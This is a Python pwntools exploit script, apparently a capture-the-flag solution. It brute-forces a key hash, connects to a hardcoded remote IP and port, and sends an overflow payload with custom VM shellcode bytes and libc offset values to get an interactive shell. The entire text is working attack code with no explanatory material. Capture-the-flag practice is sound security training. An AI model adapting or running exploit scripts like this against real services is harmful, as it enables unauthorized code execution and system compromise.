def explode_hash(hash):
    for i in range(0x2B-1, 0x5B):
        for j in range(0x2B-1, 0x5B):
            for k in range(0x2B-1, 0x5B):
                for l in range(0x2B-1, 0x5B):
                    a = i | j<<8 | k<<16 | l <<24
                    a = (0x343FD*a+0x269EC3)&0xFFFFFFFF
                    b = (a) | (((0x343FD*a+0x269EC3)&0xFFFFFFFF)<<32)
                    c = 0
                    d = b
                    for m in range(0,8):
                        c = c*0x83 + (d&0xFF)
                        c = c&0xFFFFFFFF
                        d = d >> 8
                    if c == hash:
                        return hex(b)

from pwn import *

context.log_level = 'debug'
p=remote('139.199.99.130', 8989)

p.recvuntil('Hash:')
hash = int(p.recvline(), 16)
#虚拟机爆破太慢,只能物理机爆破,然后手动填值.lol....
key = p64(int(raw_input()[0:-1],16))
p.sendline(key)
p.sendline('1')
p.sendline('0')

shellcode = '\x01\x0D\x13'+'\x01\x20\x04'+'\x05'+'\x01\x08\x14'+ \
'\x01\x0D\x13'+'\x01\x28\x04'+'\x06'+'\x01\x09\x14'+\
'\x01\x0D\x13'+'\x01\x30\x04'+'\x05'+'\x16'

payload = 'A'*0x80+shellcode+(0x20-len(shellcode))*'B'+p64(0xF72C0-0x45390)+p64(0x18CD57-0xF72C0)+p64(0xF72C0-0x21102)
p.sendline(payload)
p.recv()
p.sendline('1')
p.interactive()